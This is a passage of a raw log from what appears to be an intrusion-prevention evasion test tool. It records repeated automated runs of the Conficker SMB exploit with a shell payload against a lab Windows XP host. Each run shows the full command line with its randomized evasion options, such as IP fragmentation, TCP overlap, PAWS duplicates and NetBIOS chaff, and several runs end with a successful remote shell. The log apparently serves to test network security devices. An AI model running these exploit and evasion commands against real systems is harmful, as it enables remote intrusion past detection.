  1232. - IPv4 fragments with at most 24 bytes per fragment
  1233. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1234. - Add a random urgent data byte to every 1 TCP segment.
  1235.  
  1236. Info: NetBIOS connection 10.62.90.119:38370 -> 10.35.1.207:445
  1237. Terminated
  1238. ......
  1239. 1924 runs averaging 1.91 runs / second ; progress: 1006/43200............
  1240. 1936 runs averaging 1.91 runs / second ; progress: 1011/43200....................
  1241. 1956 runs averaging 1.92 runs / second ; progress: 1016/43200................
  1242. 1972 runs averaging 1.93 runs / second ; progress: 1021/43200.....
  1243. 1977 runs averaging 1.93 runs / second ; progress: 1026/43200
  1244. 1977 runs averaging 1.92 runs / second ; progress: 1031/43200.......
  1245. 1984 runs averaging 1.91 runs / second ; progress: 1036/43200.........2015-06-07 23:36:50 INFO
  1246. Success. (10.62.90.112):
  1247. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16837 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=t66PqlwjdXo --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"75%","http_get|http_post|msrpc_req|broken_length" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","4","3","random_msrpcreq" --evasion=[smb_opentree,smb_openpipe]tcp_overlap,"1479","new","random_alphanum" --verifydelay=1000 --payload=shell
  1248. Info: Using random seed t66PqlwjdXq
  1249. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1250. - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  1251. The following evasions are applied from stage smb_opentree to msrpc_req:
  1252. - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  1253. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1254. - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1255.  
  1256. Info: NetBIOS connection 10.62.90.112:16837 -> 10.35.1.207:445
  1257. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1258. Info: Sending MSRPC request with exploit
  1259. Info: Shell found, attack succeeded
  1260. Info: CommandShell::SendCommand() - Failed to send string
  1261. Info: Command shell connection reset.
  1262. Info: Shell closed
  1263. 0: Success.
  1264. ......Pid 8470 timed out - killed
  1265. 2015-06-07 23:36:51 INFO
  1266. Timed out (10.62.90.114):
  1267. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28648 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=rzrWoJOMQXg --evasion=[netbios_connect,end]ipv4_opt,"13","inc","alpharandomized" --evasion=[start,msrpc_req]tcp_chaff,"50%","nullflag|shorthdr","alphanumrandomized" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  1268. Info: Using random seed rzrWoJOMQXi
  1269. The following evasions are applied from stage start to msrpc_req:
  1270. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  1271. * NULL TCP control flags.
  1272. * TCP header shorter than 20 bytes
  1273. * Duplicate packet has original payload with alphanumeric bytes randomized
  1274. The following evasions are applied from stage netbios_connect to end:
  1275. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1276. The duplicate packet has identical payload except that alphabetic characters are randomized
  1277. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1278. - Add a random alphaurgent data byte to every 2 TCP segment.
  1279.  
  1280. Info: NetBIOS connection 10.62.90.114:28648 -> 10.35.1.207:445
  1281. Terminated
  1282. .
  1283. 2002 runs averaging 1.92 runs / second ; progress: 1042/43200.........................
  1284. 2027 runs averaging 1.94 runs / second ; progress: 1047/43200.....................
  1285. 2048 runs averaging 1.95 runs / second ; progress: 1052/43200...............
  1286. 2063 runs averaging 1.95 runs / second ; progress: 1057/43200.2015-06-07 23:37:07 INFO
  1287. Success. (10.62.90.112):
  1288. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57745 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=bYq5ipjquv8 --evasion=[smb_opentree,end]tcp_overlap,"6","new","random" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","112523422","random_alpha" --verifydelay=1000 --payload=shell
  1289. Info: Using random seed bYq5ipjquv9
  1290. The following evasions are applied from stage netbios_connect to msrpc_req:
  1291. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 112523422> and has random alpha bytes as payload
  1292. The following evasions are applied from stage smb_opentree to end:
  1293. - TCP segments are set to overlap by 6 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
  1294.  
  1295. Info: NetBIOS connection 10.62.90.112:57745 -> 10.35.1.207:445
  1296. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1297. Info: Sending MSRPC request with exploit
  1298. Info: Shell found, attack succeeded
  1299. Info: CommandShell::SendCommand() - Failed to send string
  1300. Info: Command shell connection reset.
  1301. Info: Shell closed
  1302. 0: Success.
  1303. ........
  1304. 2073 runs averaging 1.95 runs / second ; progress: 1062/43200...
  1305. 2076 runs averaging 1.95 runs / second ; progress: 1067/43200...Pid 8907 timed out - killed
  1306. 2015-06-07 23:37:18 INFO
  1307. Timed out (10.62.90.115):
  1308. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21523 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=q/iYCznwOBM --evasion=[netbios_connect,msrpc_req]ipv4_frag,"352" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  1309. Info: Using random seed q/iYCznwOBO
  1310. The following evasions are applied from stage netbios_connect to msrpc_req:
  1311. - IPv4 fragments with at most 352 bytes per fragment
  1312. The following evasions are applied from stage smb_opentree to end:
  1313. - Add a zero urgent data byte to every 2 TCP segment.
  1314.  
  1315. Info: NetBIOS connection 10.62.90.115:21523 -> 10.35.1.207:445
  1316. Terminated
  1317. ........
  1318. 2088 runs averaging 1.95 runs / second ; progress: 1072/43200.................
  1319. 2105 runs averaging 1.95 runs / second ; progress: 1077/43200..2015-06-07 23:37:28 INFO
  1320. Success. (10.62.90.112):
  1321. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39608 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=kCPetdTqU9U --evasion=[netbios_connect,msrpc_req]tcp_chaff,"13","nullchksum|nullflag|shorthdr","random" --evasion=[smb_opentree,end]tcp_paws,"3","8","random_alpha" --evasion=[smb_connect,smb_openpipe]tcp_segvar,"9","54646" --verifydelay=1000 --payload=shell
  1322. Info: Using random seed kCPetdTqU9W
  1323. The following evasions are applied from stage netbios_connect to msrpc_req:
  1324. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1325. * NULL TCP checksum.
  1326. * NULL TCP control flags.
  1327. * TCP header shorter than 20 bytes
  1328. * Duplicate packet has random bytes as payload
  1329. The following evasions are applied from stage smb_connect to smb_openpipe:
  1330. - TCP packets are segmented to contain between 9 and 54646 bytes of payload.
  1331. The following evasions are applied from stage smb_opentree to end:
  1332. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
  1333.  
  1334. Info: NetBIOS connection 10.62.90.112:39608 -> 10.35.1.207:445
  1335. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1336. Info: Sending MSRPC request with exploit
  1337. Info: Shell found, attack succeeded
  1338. Info: Shell closed
  1339. 0: Success.
  1340. ................
  1341. 2124 runs averaging 1.96 runs / second ; progress: 1082/43200.......................
  1342. 2148 runs averaging 1.98 runs / second ; progress: 1087/43200..............Pid 9118 timed out - killed
  1343. 2015-06-07 23:37:41 INFO
  1344. Timed out (10.62.90.113):
  1345. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42217 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=aB2TLnwEBs0 --evasion=[netbios_connect,smb_openpipe]tcp_paws,"75%","35527006","random" --evasion=[smb_opentree,msrpc_bind]tcp_paws,"1","6","shuffle30" --verifydelay=1000 --payload=shell
  1346. Info: Using random seed aB2TLnwEBs1
  1347. The following evasions are applied from stage netbios_connect to smb_openpipe:
  1348. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 35527006> and has random bytes as payload
  1349. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1350. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
  1351.  
  1352. Info: NetBIOS connection 10.62.90.113:42217 -> 10.35.1.207:445
  1353. Terminated
  1354. ..
  1355. 2164 runs averaging 1.98 runs / second ; progress: 1092/43200..................
  1356. 2182 runs averaging 1.99 runs / second ; progress: 1097/43200................
  1357. 2198 runs averaging 1.99 runs / second ; progress: 1102/43200.........2015-06-07 23:37:56 INFO
  1358. Success. (10.62.90.119):
  1359. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40371 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=fn25dE4h1gs --evasion=[start,smb_opentree]ipv4_frag,"1440" --evasion=[smb_connect,smb_openpipe]ipv4_order,"rev" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","163937280","zero" --verifydelay=1000 --payload=shell
  1360. Info: Using random seed fn25dE4h1gt
  1361. The following evasions are applied from stage start to smb_opentree:
  1362. - IPv4 fragments with at most 1440 bytes per fragment
  1363. The following evasions are applied from stage smb_connect to smb_openpipe:
  1364. - IPv4 fragments are sent in a reverse order
  1365. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1366. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 163937280> and has 0x00 bytes as payload
  1367.  
  1368. Info: NetBIOS connection 10.62.90.119:40371 -> 10.35.1.207:445
  1369. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1370. Info: Sending MSRPC request with exploit
  1371. Info: Shell found, attack succeeded
  1372. Info: Shell closed
  1373. 0: Success.
  1374. .
  1375. 2209 runs averaging 2.00 runs / second ; progress: 1107/43200.........
  1376. 2218 runs averaging 1.99 runs / second ; progress: 1112/43200................
  1377. 2234 runs averaging 2.00 runs / second ; progress: 1117/43200................
  1378. 2250 runs averaging 2.01 runs / second ; progress: 1122/43200.......2015-06-07 23:38:15 INFO
  1379. Success. (10.62.90.110):
  1380. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14671 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=eos8HvXZetA --evasion=[smb_connect,msrpc_req]smb_decoytrees,"4","3","10","random" --evasion=[start,msrpc_req]tcp_paws,"1","43471621","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"50%","7","alpharandomized" --verifydelay=1000 --payload=shell
  1381. Info: Using random seed eos8HvXZetB
  1382. The following evasions are applied from stage start to msrpc_req:
  1383. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43471621> and has original payload with alphanumeric bytes randomized
  1384. The following evasions are applied from stage smb_connect to msrpc_req:
  1385. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 10 random bytes.
  1386. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1387. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphabetic bytes randomized
  1388.  
  1389. Info: NetBIOS connection 10.62.90.110:14671 -> 10.35.1.207:445
  1390. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1391. Info: Sending MSRPC request with exploit
  1392. Info: Shell found, attack succeeded
  1393. Info: CommandShell::SendCommand() - Failed to send string
  1394. Info: Command shell connection reset.
  1395. Info: Shell closed
  1396. 0: Success.
  1397. ..
  1398. 2260 runs averaging 2.01 runs / second ; progress: 1127/43200........
  1399. 2268 runs averaging 2.00 runs / second ; progress: 1132/43200.............
  1400. 2281 runs averaging 2.01 runs / second ; progress: 1137/43200........2015-06-07 23:38:29 INFO
  1401. Success. (10.62.90.112):
  1402. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64670 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=nUqmYkZuLXg --evasion=[msrpc_req,end]smb_decoytrees,"6","3","2","random_msrpcreq" --evasion=[netbios_connect,smb_connect]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
  1403. Info: Using random seed nUqmYkZuLXi
  1404. The following evasions are applied from stage netbios_connect to smb_connect:
  1405. - 50% probability to add a zero urgent data byte to a TCP segment.
  1406. The following evasions are applied from stage msrpc_req to end:
  1407. - Before normal SMB writes, 6 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  1408.  
  1409. Info: NetBIOS connection 10.62.90.112:64670 -> 10.35.1.207:445
  1410. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1411. Info: Sending MSRPC request with exploit
  1412. Info: Shell found, attack succeeded
  1413. Info: Command shell connection reset.
  1414. Info: CommandShell::SendCommand() - Failed to send string
  1415. Info: Shell closed
  1416. 0: Success.
  1417. ..............
  1418. 2304 runs averaging 2.02 runs / second ; progress: 1142/43200..................
  1419. 2322 runs averaging 2.02 runs / second ; progress: 1147/43200........Pid 9675 timed out - killed
  1420. 2015-06-07 23:38:41 INFO
  1421. Timed out (10.62.90.117):
  1422. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38925 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=yG4ULddpIlQ --evasion=[netbios_connect,msrpc_req]tcp_chaff,"50%","nullflag|outofwindow|shorthdr","shuffle" --evasion=[smb_connect,msrpc_bind]tcp_paws,"13","1","alphanumrandomized" --evasion=[smb_opentree,end]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  1423. Info: Using random seed yG4ULddpIlT
  1424. The following evasions are applied from stage netbios_connect to msrpc_req:
  1425. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  1426. * NULL TCP control flags.
  1427. * An out-of-window sequence number.
  1428. * TCP header shorter than 20 bytes
  1429. * Duplicate packet has shuffled original payload
  1430. The following evasions are applied from stage smb_connect to msrpc_bind:
  1431. - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has original payload with alphanumeric bytes randomized
  1432. The following evasions are applied from stage smb_opentree to end:
  1433. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  1434.  
  1435. Info: NetBIOS connection 10.62.90.117:38925 -> 10.35.1.207:445
  1436. Terminated
  1437. ...
  1438. 2334 runs averaging 2.03 runs / second ; progress: 1152/43200..................
  1439. 2352 runs averaging 2.03 runs / second ; progress: 1157/43200.....................
  1440. 2373 runs averaging 2.04 runs / second ; progress: 1162/43200.......2015-06-07 23:38:55 INFO
  1441. Success. (10.62.90.113):
  1442. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36257 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5grPrOpE19A --evasion=[smb_openpipe,end]ipv4_opt,"25%","inc","zero" --evasion=[start,end]tcp_paws,"3","8","random" --verifydelay=1000 --payload=shell
  1443. Info: Using random seed 5grPrOpE19D
  1444. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
  1445. The following evasions are applied from stage smb_openpipe to end:
  1446. - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  1447. The duplicate packet has NULL bytes for payload
  1448.  
  1449. Info: NetBIOS connection 10.62.90.113:36257 -> 10.35.1.207:445
  1450. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1451. Info: Sending MSRPC request with exploit
  1452. Info: Shell found, attack succeeded
  1453. Info: CommandShell::SendCommand() - Failed to send string
  1454. Info: Command shell connection reset.
  1455. Info: Shell closed
  1456. 0: Success.
  1457. ..........
  1458. 2391 runs averaging 2.05 runs / second ; progress: 1167/43200................
  1459. 2407 runs averaging 2.05 runs / second ; progress: 1172/43200.............
  1460. 2420 runs averaging 2.06 runs / second ; progress: 1178/43200.....
  1461. 2425 runs averaging 2.05 runs / second ; progress: 1183/43200.
  1462. 2426 runs averaging 2.04 runs / second ; progress: 1188/43200........
  1463. 2434 runs averaging 2.04 runs / second ; progress: 1193/43200...............
  1464. 2449 runs averaging 2.04 runs / second ; progress: 1198/43200...................
  1465. 2468 runs averaging 2.05 runs / second ; progress: 1203/43200.....
  1466. 2473 runs averaging 2.05 runs / second ; progress: 1208/43200....
  1467. 2477 runs averaging 2.04 runs / second ; progress: 1213/43200....
  1468. 2481 runs averaging 2.04 runs / second ; progress: 1218/43200.............
  1469. 2494 runs averaging 2.04 runs / second ; progress: 1223/43200.......
  1470. 2501 runs averaging 2.04 runs / second ; progress: 1228/43200.....
  1471. 2506 runs averaging 2.03 runs / second ; progress: 1233/43200.........
  1472. 2515 runs averaging 2.03 runs / second ; progress: 1238/43200...............
  1473. 2530 runs averaging 2.04 runs / second ; progress: 1243/43200.............
  1474. 2543 runs averaging 2.04 runs / second ; progress: 1248/43200...........
  1475. 2554 runs averaging 2.04 runs / second ; progress: 1253/43200.........
  1476. 2563 runs averaging 2.04 runs / second ; progress: 1258/43200.....
  1477. 2568 runs averaging 2.03 runs / second ; progress: 1263/43200.....
  1478. 2573 runs averaging 2.03 runs / second ; progress: 1268/43200............
  1479. 2585 runs averaging 2.03 runs / second ; progress: 1273/43200........
  1480. 2593 runs averaging 2.03 runs / second ; progress: 1278/43200...Pid 12315 timed out - killed
  1481. 2015-06-07 23:40:49 INFO
  1482. Timed out (10.62.90.118):
  1483. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10694 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BVbxr7AH3E8 --evasion=[smb_openpipe,msrpc_bind]tcp_paws,"75%","1","random" --evasion=[smb_connect,smb_opentree]tcp_urgent,"5","random_alphanum" --verifydelay=1000 --payload=shell
  1484. Info: Using random seed BVbxr7AH3E8
  1485. The following evasions are applied from stage smb_connect to smb_opentree:
  1486. - Add a random alphanumeric urgent data byte to every 5 TCP segment.
  1487. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1488. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has random bytes as payload
  1489.  
  1490. Info: NetBIOS connection 10.62.90.118:10694 -> 10.35.1.207:445
  1491. Terminated
  1492. ...........
  1493. 2608 runs averaging 2.03 runs / second ; progress: 1283/43200........
  1494. 2616 runs averaging 2.03 runs / second ; progress: 1288/43200..........
  1495. 2626 runs averaging 2.03 runs / second ; progress: 1293/43200...........
  1496. 2637 runs averaging 2.03 runs / second ; progress: 1298/432002015-06-07 23:41:08 INFO
  1497. Success. (10.62.90.119):
  1498. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45516 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=b8YdQvqqZmM --evasion=[msrpc_bind,end]ipv4_frag,"336" --evasion=[smb_connect,end]ipv4_order,"lastfirst" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"1","8","shuffle30" --verifydelay=1000 --payload=shell
  1499. Info: Using random seed b8YdQvqqZmN
  1500. The following evasions are applied from stage smb_connect to end:
  1501. - IPv4 fragments are sent in correct order except that the last fragment comes first
  1502. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1503. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 30 bytes of original payload, then shuffled original payload
  1504. The following evasions are applied from stage msrpc_bind to end:
  1505. - IPv4 fragments with at most 336 bytes per fragment
  1506.  
  1507. Info: NetBIOS connection 10.62.90.119:45516 -> 10.35.1.207:445
  1508. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1509. Info: Sending MSRPC request with exploit
  1510. Info: Shell found, attack succeeded
  1511. Info: Shell closed
  1512. 0: Success.
  1513. ............
  1514. 2650 runs averaging 2.03 runs / second ; progress: 1303/43200..............
  1515. 2664 runs averaging 2.04 runs / second ; progress: 1308/43200....Pid 12868 timed out - killed
  1516. 2015-06-07 23:41:19 INFO
  1517. Timed out (10.62.90.116):
  1518. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40689 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=G4pa7GZ55rE --evasion=[netbios_connect,msrpc_bind]tcp_paws,"21","17100606","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
  1519. Info: Using random seed G4pa7GZ55rE
  1520. The following evasions are applied from stage netbios_connect to msrpc_bind:
  1521. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 17100606> and has original payload with alphabetic bytes randomized
  1522. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1523. - Add a random alphaurgent data byte to every 1 TCP segment.
  1524.  
  1525. Info: NetBIOS connection 10.62.90.116:40689 -> 10.35.1.207:445
  1526. Terminated
  1527. .....................
  1528. 2690 runs averaging 2.05 runs / second ; progress: 1313/43200............................
  1529. 2718 runs averaging 2.06 runs / second ; progress: 1318/43200.....................
  1530. 2739 runs averaging 2.07 runs / second ; progress: 1323/43200............
  1531. 2751 runs averaging 2.07 runs / second ; progress: 1328/43200..........
  1532. 2761 runs averaging 2.07 runs / second ; progress: 1333/43200...........
  1533. 2772 runs averaging 2.07 runs / second ; progress: 1338/43200........
  1534. 2780 runs averaging 2.07 runs / second ; progress: 1344/43200.......
  1535. 2787 runs averaging 2.07 runs / second ; progress: 1349/43200....2015-06-07 23:42:02 INFO
  1536. Success. (10.62.90.116):
  1537. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42180 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=mvJYiHN4XVQ --evasion=[start,msrpc_bind]ipv4_opt,"21","inc","random_alphanum" --evasion=[start,end]tcp_paws,"50%","43541637","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  1538. Info: Using random seed mvJYiHN4XVS
  1539. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43541637> and has random alphanumeric bytes as payload
  1540. The following evasions are applied from stage start to msrpc_bind:
  1541. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1542. The duplicate packet has random alphanumeric bytes as payload
  1543. The following evasions are applied from stage netbios_connect to msrpc_req:
  1544. - TCP timestamps echo reply value is sent in the wrong endianness
  1545.  
  1546. Info: NetBIOS connection 10.62.90.116:42180 -> 10.35.1.207:445
  1547. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1548. Info: Sending MSRPC request with exploit
  1549. Info: Shell found, attack succeeded
  1550. Info: CommandShell::SendCommand() - Failed to send string
  1551. Info: Command shell connection reset.
  1552. Info: Shell closed
  1553. 0: Success.
  1554. ...
  1555. 2795 runs averaging 2.06 runs / second ; progress: 1354/43200..........
  1556. 2805 runs averaging 2.06 runs / second ; progress: 1359/43200.............
  1557. 2818 runs averaging 2.07 runs / second ; progress: 1364/43200.........2015-06-07 23:42:15 INFO
  1558. Success. (10.62.90.119):
  1559. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29827 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=rSQh8xLHN/Y --evasion=[smb_opentree,msrpc_bind]ipv4_opt,"1","inc","alpharandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"25%","67977854","alphanumrandomized" --verifydelay=1000 --payload=shell
  1560. Info: Using random seed rSQh8xLHN/a
  1561. The following evasions are applied from stage netbios_connect to msrpc_req:
  1562. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 67977854> and has original payload with alphanumeric bytes randomized
  1563. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1564. - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1565. The duplicate packet has identical payload except that alphabetic characters are randomized
  1566.  
  1567. Info: NetBIOS connection 10.62.90.119:29827 -> 10.35.1.207:445
  1568. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1569. Info: Sending MSRPC request with exploit
  1570. Info: Shell found, attack succeeded
  1571. Info: Command shell connection reset.
  1572. Info: CommandShell::SendCommand() - Failed to send string
  1573. Info: Shell closed
  1574. 0: Success.
  1575. ......
  1576. 2834 runs averaging 2.07 runs / second ; progress: 1369/43200...............
  1577. 2849 runs averaging 2.07 runs / second ; progress: 1374/43200...Pid 14369 timed out - killed
  1578. 2015-06-07 23:42:26 INFO
  1579. Timed out (10.62.90.114):
  1580. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60127 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=C5hrHohMDyM --evasion=[smb_connect,end]netbios_chaff,"21","empty_unspec|empty_keepalive|http_get|http_post|msrpc_req|broken_length" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  1581. Info: Using random seed C5hrHohMDyM
  1582. The following evasions are applied from stage smb_connect to msrpc_bind:
  1583. - 25% probability to add a zero urgent data byte to a TCP segment.
  1584. The following evasions are applied from stage smb_connect to end:
  1585. - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1586.  
  1587. Info: NetBIOS connection 10.62.90.114:60127 -> 10.35.1.207:445
  1588. Terminated
  1589. ......
  1590. 2859 runs averaging 2.07 runs / second ; progress: 1379/43200.............2015-06-07 23:42:33 INFO
  1591. Success. (10.62.90.118):
  1592. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30054 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=6kx/4FvdT9w --evasion=[smb_connect,msrpc_req]tcp_paws,"1","3","alphanumrandomized" --evasion=[smb_connect,end]tcp_tsoptreply,"le" --evasion=[smb_opentree,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  1593. Info: Using random seed 6kx/4FvdT9z
  1594. The following evasions are applied from stage smb_connect to msrpc_req:
  1595. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
  1596. The following evasions are applied from stage smb_connect to end:
  1597. - TCP timestamps echo reply value is sent in the wrong endianness
  1598. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1599. - TCP timestamps echo reply value is sent in the wrong endianness
  1600.  
  1601. Info: NetBIOS connection 10.62.90.118:30054 -> 10.35.1.207:445
  1602. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
